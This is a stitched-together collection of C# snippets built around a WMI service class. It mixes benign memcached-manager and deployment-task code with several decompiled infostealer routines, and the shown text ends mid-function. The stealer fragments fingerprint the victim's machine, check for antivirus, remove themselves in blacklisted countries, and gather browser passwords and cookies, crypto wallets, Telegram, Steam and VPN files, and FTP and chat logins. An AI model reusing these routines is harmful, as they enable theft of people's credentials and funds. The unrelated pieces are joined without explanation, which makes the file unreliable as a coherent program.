public void ReadInstancesFromServer()
{
List <WmiService> services;
if (this.UseImpersonation == true)
{
services = WmiService.GetAllServices(this.ServerName, this.UserName, Encryption.Decrypt(this.Password), "PathName LIKE '%memcached%'");
}
else
{
services = WmiService.GetAllServices(this.ServerName, null, null, "PathName LIKE '%memcached%'");
}
Instances.Clear();
foreach (WmiService service in services)
{
Instance instance = new Instance();
instance.DisplayName = service.DisplayName;
instance.ServiceName = service.Name;
instance.ParseImagePath(service.PathName);
Instances.Add(instance);
}
//ImpersonateUser impersonateUser = null;
//try
//{
// if (this.UseImpersonation == true)
// {
// impersonateUser = new ImpersonateUser(UserName, Encryption.Decrypt(Password));
// }
// RegistryKey serviceBranchKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, this.ServerName).OpenSubKey(@"SYSTEM\CurrentControlSet\Services");
// Instances.Clear();
// foreach (string serviceName in serviceBranchKey.GetSubKeyNames())
// {
// RegistryKey serviceKey = serviceBranchKey.OpenSubKey(serviceName);
// string imagePath;
// if ((imagePath = (string)serviceKey.GetValue("ImagePath", String.Empty)) != String.Empty)
// {
// if (imagePath.ToLower().Contains("memcached.exe") == true)
// {
// Instance instance = new Instance();
// instance.DisplayName = (string)serviceKey.GetValue("DisplayName", String.Empty);
// Instances.Add(instance);
// }
// }
// }
//}
//finally
//{
// if(impersonateUser != null && impersonateUser.IsImpersonating == true)
// impersonateUser.Undo();
//}
}
internal void Start(Business.Server server, SetStatusLabelDelegate setStatusLabelDelegate)
{
string userName = null;
string password = null;
if (server.UseImpersonation == true)
{
userName = server.UserName;
password = Encryption.Decrypt(server.Password);
}
List <WmiService> services = WmiService.GetAllServices(server.ServerName, userName, password, "Name = '" + this.ServiceName + "'");
foreach (WmiService service in services)
{
setStatusLabelDelegate("Starting " + service.DisplayName);
ReturnValue returnValue;
if (service.State != State.Running && service.State != State.StartPending)
{
if ((returnValue = WmiService.Start(server.ServerName, userName, password, service.Name)) != ReturnValue.Success)
{
throw new Exception("Couldn't start service: " + service.DisplayName + ", the result was: " + returnValue);
}
}
}
setStatusLabelDelegate("Ready.");
}
public void Start()
{
var authInfo = GetAuthenticationInfo();
WmiService.WithAuthentication(authInfo.WmiUserName, authInfo.WmiPassword);
var t = new WinServiceStopTask(authInfo.MachineName, "IISADMIN");
var verifyStopResult = t.VerifyCanRun();
Log(verifyStopResult);
AssertSuccess(verifyStopResult);
var stopResult = t.Execute();
Log(stopResult);
AssertSuccess(stopResult);
var t2 = new WinServiceStartTask(authInfo.MachineName, "IISADMIN");
var verifyStartResult = t2.VerifyCanRun();
Log(verifyStartResult);
AssertSuccess(verifyStartResult);
var startResult = t2.Execute();
Log(startResult);
AssertSuccess(startResult);
}
public override DeploymentResult Execute()
{
var result = new DeploymentResult();
if (UserName.ShouldPrompt())
{
UserName = _prompt.Prompt("Win Service '{0}' UserName".FormatWith(ServiceName));
}
if (Password.ShouldPrompt())
{
Password = _prompt.Prompt("Win Service '{0}' For User '{1}' Password".FormatWith(ServiceName, UserName));
}
ServiceReturnCode returnCode = WmiService.Create(MachineName, ServiceName, ServiceDisplayName, ServiceLocation,
StartMode, UserName, Password, Dependencies);
if (returnCode != ServiceReturnCode.Success)
{
result.AddAlert("Create service returned {0}".FormatWith(returnCode.ToString()));
}
else
{
result.AddGood("Create service succeeded.");
}
return(result);
}
public override DeploymentResult Execute()
{
var result = new DeploymentResult();
ServiceReturnCode returnCode = WmiService.Delete(MachineName, ServiceName);
return(result);
}
public static ProtoServer WithAuthentication(this ProtoServer server, string remoteUserName, string remotePassword)
{
var interpolator = new CaseInsensitiveInterpolator();
remoteUserName = interpolator.ReplaceTokens(HUB.Settings, remoteUserName);
remotePassword = interpolator.ReplaceTokens(HUB.Settings, remotePassword);
WmiService.WithAuthentication(remoteUserName, remotePassword);
return(server);
}
public static UserLog Create(ClientSettings settings)
{
UserLog userLog = new UserLog();
try
{
GeoInfo geoInfo = GeoHelper.Get();
IList <string> blacklistedCountry = settings.BlacklistedCountry;
if (blacklistedCountry != null && blacklistedCountry.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country))
{
InstallManager.RemoveCurrent();
}
WmiDiskDrive wmiDiskDrive = new WmiService().QueryFirst <WmiDiskDrive>(new WmiDiskDriveQuery());
Size size = Screen.PrimaryScreen.Bounds.Size;
string text = System.TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString();
if (!text.StartsWith("-"))
{
text = "+" + text;
}
userLog.IP = geoInfo.IP;
userLog.Location = geoInfo.Location;
userLog.Country = geoInfo.Country;
userLog.Screenshot = CaptureScreen();
userLog.UserAgent = UserAgentDetector.GetUserAgent();
IList <string> blacklistedCountry2 = settings.BlacklistedCountry;
if (blacklistedCountry2 != null && blacklistedCountry2.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country))
{
InstallManager.RemoveCurrent();
}
userLog.HWID = DecryptHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + wmiDiskDrive.SerialNumber).Replace("-", string.Empty);
userLog.CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName;
userLog.TimeZone = "UTC" + text;
userLog.MonitorSize = $"{size.Width}x{size.Height}";
userLog.IsProcessElevated = NativeMethods.IsUserAnAdmin();
userLog.UacType = UacHelper.AdminPromptBehavior;
userLog.OS = OsDetector.GetWindowsVersion();
userLog.Username = Environment.UserName;
return(userLog);
}
catch
{
return(userLog);
}
finally
{
userLog.HWID = (string.IsNullOrWhiteSpace(userLog.HWID) ? "UNKNOWN" : userLog.HWID);
userLog.IP = (string.IsNullOrWhiteSpace(userLog.IP) ? "UNKNOWN" : userLog.IP);
userLog.MonitorSize = (string.IsNullOrWhiteSpace(userLog.MonitorSize) ? "UNKNOWN" : userLog.MonitorSize);
userLog.OS = (string.IsNullOrWhiteSpace(userLog.OS) ? "UNKNOWN" : userLog.OS);
userLog.TimeZone = (string.IsNullOrWhiteSpace(userLog.TimeZone) ? "UNKNOWN" : userLog.TimeZone);
userLog.Username = (string.IsNullOrWhiteSpace(userLog.Username) ? "UNKNOWN" : userLog.Username);
userLog.Location = (string.IsNullOrWhiteSpace(userLog.Location) ? "UNKNOWN" : userLog.Location);
userLog.Country = (string.IsNullOrWhiteSpace(userLog.Country) ? "UNKNOWN" : userLog.Country);
userLog.CurrentLanguage = (string.IsNullOrWhiteSpace(userLog.CurrentLanguage) ? "UNKNOWN" : userLog.CurrentLanguage);
userLog.UserAgent = (string.IsNullOrWhiteSpace(userLog.UserAgent) ? "UNKNOWN" : userLog.UserAgent);
}
}
internal void RemoveFromServer(Business.Server server, SetStatusLabelDelegate setStatusLabelDelegate)
{
string userName = null;
string password = null;
if (server.UseImpersonation == true)
{
userName = server.UserName;
password = Encryption.Decrypt(server.Password);
}
List <WmiService> services = WmiService.GetAllServices(server.ServerName, userName, password, "Name = '" + this.ServiceName + "'");
// Saftey in case we get too many services back, we don't want to delete them all...
if (services.Count > 20)
{
StringBuilder servicesToRemove = new StringBuilder("This action will remove the following services, are you sure?\n");
foreach (WmiService service in services)
{
servicesToRemove.AppendFormat("\n{0}", service.DisplayName);
}
if (MessageBox.Show(servicesToRemove.ToString(), "Are you sure?", MessageBoxButtons.OKCancel, MessageBoxIcon.Question) == DialogResult.Cancel)
{
return;
}
}
foreach (WmiService service in services)
{
setStatusLabelDelegate("Removing " + service.DisplayName);
ReturnValue returnValue;
if (service.State != State.Stopped)
{
if ((returnValue = WmiService.Stop(server.ServerName, userName, password, service.Name)) != ReturnValue.Success)
{
throw new Exception("Couldn't stop service: " + service.DisplayName + ", the result was: " + returnValue);
}
}
if ((returnValue = WmiService.Delete(server.ServerName, userName, password, service.Name)) != ReturnValue.Success)
{
throw new Exception("Couldn't remove service: " + service.DisplayName + ", the result was: " + returnValue);
}
}
setStatusLabelDelegate("Ready.");
}
public void RemoteDelete()
{
var authInfo = GetAuthenticationInfo();
WmiService.WithAuthentication(authInfo.ServiceUserName, authInfo.ServicePassword);
var t = new WinServiceDeleteTask(authInfo.MachineName, "DropkicKTestService");
DeploymentResult o = t.VerifyCanRun();
Log(o);
AssertSuccess(o);
var result = t.Execute();
Log(result);
AssertSuccess(result);
}
public override DeploymentResult Execute()
{
var result = new DeploymentResult();
if (!ServiceExists())
{
result.AddNote("Cannot delete service '{0}', service does not exist".FormatWith(ServiceName));
}
else
{
ServiceReturnCode returnCode = WmiService.Delete(MachineName, ServiceName);
if (returnCode != ServiceReturnCode.Success)
{
result.AddAlert("Deleting service '{0}' failed: '{1}'".FormatWith(ServiceName, returnCode));
}
}
return(result);
}
public void RemoteCreate()
{
var authInfo = GetAuthenticationInfo();
WmiService.WithAuthentication(authInfo.WmiUserName, authInfo.WmiPassword);
var t = new WinServiceCreateTask(authInfo.MachineName, "DropKicKTestService");
t.ServiceLocation = "C:\\Test\\TestService.exe";
t.StartMode = ServiceStartMode.Automatic;
t.UserName = authInfo.ServiceUserName;
t.Password = authInfo.ServicePassword;
DeploymentResult o = t.VerifyCanRun();
AssertSuccess(o);
var result = t.Execute();
Log(result);
AssertSuccess(result);
}
internal State GetServiceState(Server server)
{
string userName = null;
string password = null;
if (server.UseImpersonation == true)
{
userName = server.UserName;
password = Encryption.Decrypt(server.Password);
}
List <WmiService> services = WmiService.GetAllServices(server.ServerName, userName, password, "Name = '" + this.ServiceName + "'");
if (services.Count > 0)
{
return(services[0].State);
}
return(State.Unknown);
}
private string GetNextMemcachedInstanceName()
{
List <WmiService> services;
if (_server.UseImpersonation == true)
{
services = WmiService.GetAllServices(_server.ServerName, _server.UserName, Encryption.Decrypt(_server.Password), "PathName LIKE '%memcached%'");
}
else
{
services = WmiService.GetAllServices(_server.ServerName, null, null, "PathName LIKE '%memcached%'");
}
int highestInstanceNumber = 0;
Regex instanceFinder = new Regex(
"\\w+_(?<instanceNumber>\\d+)",
RegexOptions.Multiline
| RegexOptions.Singleline
| RegexOptions.CultureInvariant
| RegexOptions.Compiled
);
foreach (WmiService service in services)
{
Match match = instanceFinder.Match(service.Name);
if (match.Success == true)
{
int instanceNumber = 0;
if (int.TryParse(match.Groups["instanceNumber"].Value, out instanceNumber) == true && instanceNumber > highestInstanceNumber)
{
highestInstanceNumber = instanceNumber;
}
}
}
int newInstanceNumber = highestInstanceNumber + 1;
return("MemCacheD_" + newInstanceNumber);
}
// Token: 0x060000AB RID: 171 RVA: 0x00003698 File Offset: 0x00001898
public static UserLog Create(ClientSettings settings)
{
UserLog result = default(UserLog);
try
{
GeoInfo geoInfo = GeoHelper.Get();
geoInfo.IP = (string.IsNullOrWhiteSpace(geoInfo.IP) ? "UNKNOWN" : geoInfo.IP);
geoInfo.Location = (string.IsNullOrWhiteSpace(geoInfo.Location) ? "UNKNOWN" : geoInfo.Location);
geoInfo.Country = (string.IsNullOrWhiteSpace(geoInfo.Country) ? "UNKNOWN" : geoInfo.Country);
geoInfo.PostalCode = (string.IsNullOrWhiteSpace(geoInfo.PostalCode) ? "UNKNOWN" : geoInfo.PostalCode);
IList <string> blacklistedCountry = settings.BlacklistedCountry;
if (blacklistedCountry != null && blacklistedCountry.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country))
{
InstallManager.RemoveCurrent();
}
IList <string> blacklistedIP = settings.BlacklistedIP;
if (blacklistedIP != null && blacklistedIP.Count > 0 && settings.BlacklistedIP.Contains(geoInfo.IP))
{
InstallManager.RemoveCurrent();
}
WmiDiskDrive wmiDiskDrive = null;
try
{
wmiDiskDrive = new WmiService().QueryFirst <WmiDiskDrive>(new WmiDiskDriveQuery());
}
catch (Exception)
{
}
result.HWID = DecryptHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + ((wmiDiskDrive != null) ? wmiDiskDrive.SerialNumber : null)).Replace("-", string.Empty);
string text = TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString();
if (!text.StartsWith("-"))
{
text = "+" + text;
}
result.IP = geoInfo.IP;
result.Location = geoInfo.Location;
result.Country = geoInfo.Country;
result.PostalCode = geoInfo.PostalCode;
if (settings.GrabScreenshot)
{
result.Screenshot = UserLogHelper.CaptureScreen();
}
if (settings.GrabUserAgent)
{
result.FingerPrint = UserAgentDetector.GetFingerPrint();
}
else
{
result.FingerPrint = new FingerPrint
{
Plugins = "UNKNOWN",
UserAgent = "UNKNOWN",
WebBaseGlRenderer = "UNKNOWN",
WebBaseGlVendor = "UNKNOWN",
WebBaseGlVersion = "UNKNOWN",
WebDebugGlRenderer = "UNKNOWN",
WebDebugGlVendor = "UNKNOWN"
};
}
result.CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName;
result.TimeZone = "UTC" + text;
Size size = Screen.PrimaryScreen.Bounds.Size;
result.MonitorSize = string.Format("{0}x{1}", size.Width, size.Height);
result.IsProcessElevated = false;
result.OS = OsDetector.GetWindowsVersion();
result.Username = Environment.UserName;
}
catch (Exception)
{
}
finally
{
result.HWID = (string.IsNullOrWhiteSpace(result.HWID) ? "UNKNOWN" : result.HWID);
result.MonitorSize = (string.IsNullOrWhiteSpace(result.MonitorSize) ? "UNKNOWN" : result.MonitorSize);
result.OS = (string.IsNullOrWhiteSpace(result.OS) ? "UNKNOWN" : result.OS);
result.TimeZone = (string.IsNullOrWhiteSpace(result.TimeZone) ? "UNKNOWN" : result.TimeZone);
result.Username = (string.IsNullOrWhiteSpace(result.Username) ? "UNKNOWN" : result.Username);
result.IP = (string.IsNullOrWhiteSpace(result.IP) ? "UNKNOWN" : result.IP);
result.PostalCode = (string.IsNullOrWhiteSpace(result.PostalCode) ? "UNKNOWN" : result.PostalCode);
result.Location = (string.IsNullOrWhiteSpace(result.Location) ? "UNKNOWN" : result.Location);
result.Country = (string.IsNullOrWhiteSpace(result.Country) ? "UNKNOWN" : result.Country);
result.CurrentLanguage = (string.IsNullOrWhiteSpace(result.CurrentLanguage) ? "UNKNOWN" : result.CurrentLanguage);
}
return(result);
}
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials
{
Browsers = new List <Browser>(),
Files = new List <RemoteFile>(),
FtpConnections = new List <LoginPair>(),
Hardwares = new List <Hardware>(),
InstalledBrowsers = new List <InstalledBrowserInfo>(),
InstalledSoftwares = new List <string>(),
Languages = new List <string>(),
Processes = new List <string>(),
Defenders = new List <string>()
};
try
{
WmiService wmiService = new WmiService();
try
{
ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery());
credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = $"{x.NumberOfCores}"
}).ToList();
}
catch
{
}
try
{
if (credentials.Hardwares == null)
{
credentials.Hardwares = new List <Hardware>();
}
foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery())
where x.AdapterRAM != 0
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = $"{x.AdapterRAM}"
}).ToList())
{
credentials.Hardwares.Add(item);
}
}
catch
{
}
try
{
List <WmiQueryBase> list = new List <WmiQueryBase>
{
new WmiAntivirusQuery(),
new WmiAntiSpyWareQuery(),
new WmiFirewallQuery()
};
string[] array = new string[2]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> list2 = new List <WmiAntivirus>();
foreach (WmiQueryBase item2 in list)
{
string[] array2 = array;
foreach (string scope in array2)
{
try
{
list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList());
}
catch
{
}
}
}
credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList();
}
catch
{
}
credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers();
credentials.Processes = UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
credentials.Languages = UserInfoHelper.AvailableLanguages();
if (settings.GrabBrowsers)
{
List <Browser> list3 = new List <Browser>();
list3.AddRange(ChromiumEngine.ParseBrowsers());
list3.AddRange(GeckoEngine.ParseBrowsers());
list3.Add(EdgeEngine.ParseBrowsers());
foreach (Browser item3 in list3)
{
if (!item3.IsEmpty())
{
credentials.Browsers.Add(item3);
}
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths);
}
if (settings.GrabFTP)
{
List <LoginPair> list4 = new List <LoginPair>();
list4.AddRange(FileZilla.ParseConnections());
list4.AddRange(WinSCP.ParseConnections());
credentials.FtpConnections = list4;
}
if (settings.GrabImClients)
{
foreach (LoginPair item4 in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(item4);
}
return(credentials);
}
return(credentials);
}
catch
{
return(credentials);
}
}
//private string _serviceUserName;
//private string _servicePassword;
internal void UpdateInstanceOnServer(Business.Server server, SetStatusLabelDelegate setStatusLabelDelegate)
{
//ImpersonateUser impersonateUser = null;
try
{
//if (server.UseImpersonation == true)
//{
// setStatusLabelDelegate("Impersonating user: "******"Checking MemCacheD.exe on remote server.");
string binaryPath = server.EnsureExecutableIsAvailabeOnServer(false);
string userName = null;
string password = null;
if (server.UseImpersonation == true)
{
userName = server.UserName;
password = Encryption.Decrypt(server.Password);
}
setStatusLabelDelegate("Updating service on remote server.");
WmiService.CreateOrUpdate(server.ServerName, userName, password, this.ServiceName, this.DisplayName, this.CreateImagePath(), StartMode.Auto, null, null);
}
finally
{
//if (impersonateUser != null && impersonateUser.IsImpersonating == true)
// impersonateUser.Undo();
}
/*
* string description = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName).GetValue("Description").ToString();
* string imagePath = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName).GetValue("ImagePath").ToString();
* string newImagePath = imagePath.Substring(0, imagePath.LastIndexOf("memcached.exe") + ((string)("memcached.exe")).Length);
*
* int tcpPort;
* if (int.TryParse(txtTcpPort.Text, out tcpPort) == true)
* newImagePath += " -p " + tcpPort;
*
* int udpPort;
* if (int.TryParse(txtUdpPort.Text, out udpPort) == true)
* newImagePath += " -U " + udpPort;
*
* if (chkMaximizeCoreFile.Checked == true)
* newImagePath += " -r";
*
* int maxMemory;
* if (int.TryParse(txtMemoryLimit.Text, out maxMemory) == true)
* newImagePath += " -m " + maxMemory;
*
* Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName, true).SetValue("ImagePath", newImagePath);
*
* Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services\" + _serviceController.ServiceName, true).SetValue("DisplayName", txtInstanceName.Text);
*
* bool requiresRestart = false;
* if (_serviceController.Status == ServiceControllerStatus.Running)
* {
* requiresRestart = true;
* lblStatus.Text = "Stopping " + txtInstanceName.Text;
* Refresh();
*
* _serviceController.Stop();
* }
*
* lblStatus.Text = "Removing " + _serviceController.DisplayName;
* Refresh();
* ServiceUtility.UninstallService(_serviceController.ServiceName);
*
* lblStatus.Text = "Reinstalling " + txtInstanceName.Text;
* Refresh();
* ServiceUtility.InstallService(_serviceController.ServiceName, txtInstanceName.Text, description, newImagePath);
*
* if (requiresRestart == true)
* {
* lblStatus.Text = "Starting " + txtInstanceName.Text;
* Refresh();
* _serviceController.Start();
* }
*
* lblStatus.Text = "Ready.";
*
*/
}
// Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials
{
Defenders = new List <string>(),
Browsers = new List <Browser>(),
Files = new List <RemoteFile>(),
FtpConnections = new List <LoginPair>(),
Hardwares = new List <Hardware>(),
InstalledBrowsers = new List <InstalledBrowserInfo>(),
InstalledSoftwares = new List <string>(),
Languages = new List <string>(),
Processes = new List <string>(),
ColdWallets = new List <ColdWallet>(),
ImportantAutofills = new List <Autofill>(),
SteamFiles = new List <RemoteFile>(),
NordVPN = new List <LoginPair>(),
OpenVPN = new List <RemoteFile>(),
ProtonVPN = new List <RemoteFile>(),
TelegramFiles = new List <RemoteFile>()
};
try
{
try
{
ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null);
credentials.Hardwares = (from x in source
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = string.Format("{0}", x.NumberOfCores)
}).ToList <Hardware>();
}
catch
{
}
try
{
WmiService wmiService = new WmiService();
if (credentials.Hardwares == null)
{
credentials.Hardwares = new List <Hardware>();
}
foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null)
where x.AdapterRAM > 0U
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = string.Format("{0}", x.AdapterRAM)
}).ToList <Hardware>())
{
credentials.Hardwares.Add(item);
}
}
catch
{
}
try
{
credentials.Hardwares.Add(new Hardware
{
Caption = "Total of RAM",
HardType = HardwareType.Graphic,
Parameter = UserInfoHelper.TotalOfRAM()
});
}
catch
{
}
try
{
WmiService wmiService2 = new WmiService();
List <WmiQueryBase> list = new List <WmiQueryBase>
{
new WmiAntivirusQuery(),
new WmiAntiSpyWareQuery(),
new WmiFirewallQuery()
};
string[] array = new string[]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> list2 = new List <WmiAntivirus>();
foreach (WmiQueryBase wmiQuery in list)
{
foreach (string scope in array)
{
try
{
list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
}
catch
{
}
}
}
credentials.Defenders = (from x in list2
select x.DisplayName).Distinct <string>().ToList <string>();
}
catch
{
}
credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers();
credentials.Processes = UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
credentials.Languages = UserInfoHelper.AvailableLanguages();
if (settings.GrabTelegram)
{
credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles());
}
if (settings.GrabVPN)
{
credentials.NordVPN.AddRange(NordVPN.GetProfile());
credentials.OpenVPN.AddRange(OpenVPN.ParseFiles());
credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles());
}
if (settings.GrabSteam)
{
credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles());
}
if (settings.GrabBrowsers)
{
List <Browser> list3 = new List <Browser>();
if (settings.PortablePaths == null)
{
settings.PortablePaths = new List <string>();
}
settings.PortablePaths.Add(Constants.RoamingAppData);
settings.PortablePaths.Add(Constants.LocalAppData);
List <string> list4 = new List <string>();
List <string> list5 = new List <string>();
foreach (string text in Constants.chromiumBrowserPaths)
{
string text2 = string.Empty;
if (text.Contains("Opera"))
{
text2 = Constants.RoamingAppData + text;
}
else
{
text2 = Constants.LocalAppData + text;
}
if (Directory.Exists(text2))
{
foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[]
{
"Login Data",
"Web Data",
"Cookies"
}))
{
if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3))
{
list4.Add(text3);
}
}
}
}
foreach (string str in Constants.geckoBrowserPaths)
{
try
{
string text4 = Constants.RoamingAppData + str;
if (Directory.Exists(text4))
{
foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[]
{
"key3.db",
"key4.db",
"cookies.sqlite",
"logins.json"
}))
{
if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5))
{
list5.Add(text5);
}
}
}
}
catch
{
}
}
list3.AddRange(ChromiumEngine.ParseBrowsers(list4));
list3.AddRange(GeckoEngine.ParseBrowsers(list5));
foreach (Browser browser in list3)
{
if (!browser.IsEmpty())
{
using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator())
{
while (enumerator6.MoveNext())
{
Autofill autofill = enumerator6.Current;
if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value))
{
credentials.ImportantAutofills.Add(autofill);
}
}
}
credentials.Browsers.Add(browser);
}
}
}
if (settings.GrabWallets)
{
List <ColdWallet> list6 = new List <ColdWallet>();
list6.AddRange(ColdWalletsGrabber.ParseFiles());
foreach (ColdWallet item2 in list6)
{
credentials.ColdWallets.Add(item2);
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null);
}
if (settings.GrabFTP)
{
List <LoginPair> list7 = new List <LoginPair>();
list7.AddRange(FileZilla.ParseConnections());
list7.AddRange(WinSCP.ParseConnections());
credentials.FtpConnections = list7;
}
if (settings.GrabImClients)
{
foreach (LoginPair item3 in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(item3);
}
}
}
catch (Exception)
{
}
return(credentials);
}
private void SaveChanges()
{
if (chkUseSpecificIPAddress.Checked == true && IsIpAddressValid() == false)
{
MessageBox.Show("IP address specified is not a legal IP address.");
return;
}
//if (VerifyFieldValues() == false)
//{
// MessageBox.Show("IP address specified is not a legal IP address.");
// return;
//}
if (AreIpAndTcpAndUdpPortUniqueForInstance() == false)
{
MessageBox.Show("You must specify a unique TCP/IP IP address and port combination.", "IP address or port duplication error.", MessageBoxButtons.OK, MessageBoxIcon.Error);
return;
}
if (IsInstanceNameUnique() == false)
{
MessageBox.Show("Instance name is not unique.");
return;
}
Cursor = Cursors.WaitCursor;
SetStatusLabel("Saving.");
//ImpersonateUser impersonateUser = null;
try
{
//if (_server.UseImpersonation == true)
//{
// SetStatusLabel("Saving: Setting up impersonation.");
// impersonateUser = new ImpersonateUser(_server.UserName, Encryption.Decrypt(_server.Password));
//}
//
//string networkPath = null;
//try
//{
// networkPath = "\\\\" + _server.ServerName + "\\c$";
// Directory.GetDirectories(networkPath);
//}
//catch (Exception ex)
//{
// MessageBox.Show("Couldn't establish connection on network path: " + networkPath + "\n\n" + ex.Message);
// return;
//}
bool isNewInstance = false;
try
{
if (_instance == null)
{
string nextInstanceServiceName = GetNextMemcachedInstanceName();
_instance = new MemCacheDManager.Business.Instance();
_instance.ServiceName = nextInstanceServiceName;
_instance.ImageBasePath = _server.BinaryPath;
_server.Instances.Add(_instance);
isNewInstance = true;
}
}
catch (Exception ex)
{
MessageBox.Show("Couldn't get a list of instances on this server. Please check server connectivity and user credentials and try again.\n" + ex.Message, "Error.", MessageBoxButtons.OK, MessageBoxIcon.Error);
return;
}
// TODO: Add rest of fields here.
_instance.DisplayName = txtInstanceName.Text;
decimal chunkSizeGrowthFactor = 0;
string chunkSizeString = ConvertDecimalUserInputToLocalizedString(txtChunkSizeGrowthFactor.Text);
if (Decimal.TryParse(chunkSizeString, out chunkSizeGrowthFactor) == true)
{
_instance.ChunkSizeGrowthFactor = chunkSizeGrowthFactor;
}
int defaultKeySize = 0;
if (Int32.TryParse(txtDefaultKeySize.Text, out defaultKeySize) == true)
{
_instance.DefaultKeySize = defaultKeySize;
}
_instance.MaximizeCoreFile = chkMaximizeCoreFile.Checked;
int maximumConnections = 0;
if (Int32.TryParse(txtMaximumConnections.Text, out maximumConnections) == true)
{
_instance.MaximumConnections = maximumConnections;
}
int memoryLimit = 0;
if (Int32.TryParse(txtMemoryLimit.Text, out memoryLimit) == true)
{
_instance.MemoryLimit = memoryLimit;
}
_instance.UseManagedInstance = chkUseManagedInstance.Checked;
if (chkUseSpecificIPAddress.Checked == true)
{
_instance.IpAddress = txtIpAddress.Text;
}
else
{
_instance.IpAddress = null;
}
if (chkUseUDP.Checked == true)
{
int udpPort = 0;
if (Int32.TryParse(txtUdpPort.Text, out udpPort) == true)
{
_instance.UdpPort = udpPort;
}
}
else
{
_instance.UdpPort = 0;
}
int tcpPort;
Int32.TryParse(txtTcpPort.Text, out tcpPort);
_instance.TcpPort = tcpPort;
_instance.UpdateInstanceOnServer(_server, this.SetStatusLabel);
if (isNewInstance == true)
{
if (MessageBox.Show("Would you like to start the new instance now?", "Start Service?", MessageBoxButtons.YesNo) == DialogResult.Yes)
{
string userName = null;
string password = null;
if (_server.UseImpersonation == true)
{
userName = _server.UserName;
password = Encryption.Decrypt(_server.Password);
}
SetStatusLabel("Starting service.");
Cursor.Current = Cursors.WaitCursor;
try
{
WmiService.Start(_server.ServerName, userName, password, _instance.ServiceName);
}
finally
{
SetStatusLabel("Service started.");
Cursor.Current = Cursors.Default;
}
}
}
btnApply.Enabled = false;
SetStatusLabel("Updating cofiguration file.");
ServerConfiguration.Save(Configuration.Default.LastConfigFile);
SetStatusLabel("Refreshing UI.");
if (Save != null)
{
Save(this, EventArgs.Empty);
}
}
finally
{
//if (impersonateUser != null && impersonateUser.IsImpersonating == true)
// impersonateUser.Undo();
Cursor = Cursors.Default;
SetStatusLabel("Ready.");
}
}
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials()
{
Browsers = (IList <Browser>) new List <Browser>(),
Files = (IList <RemoteFile>) new List <RemoteFile>(),
FtpConnections = (IList <LoginPair>) new List <LoginPair>(),
Hardwares = (IList <Hardware>) new List <Hardware>(),
InstalledBrowsers = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(),
InstalledSoftwares = (IList <string>) new List <string>(),
Languages = (IList <string>) new List <string>(),
Processes = (IList <string>) new List <string>(),
Defenders = (IList <string>) new List <string>()
};
try
{
WmiService wmiService = new WmiService();
try
{
ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null);
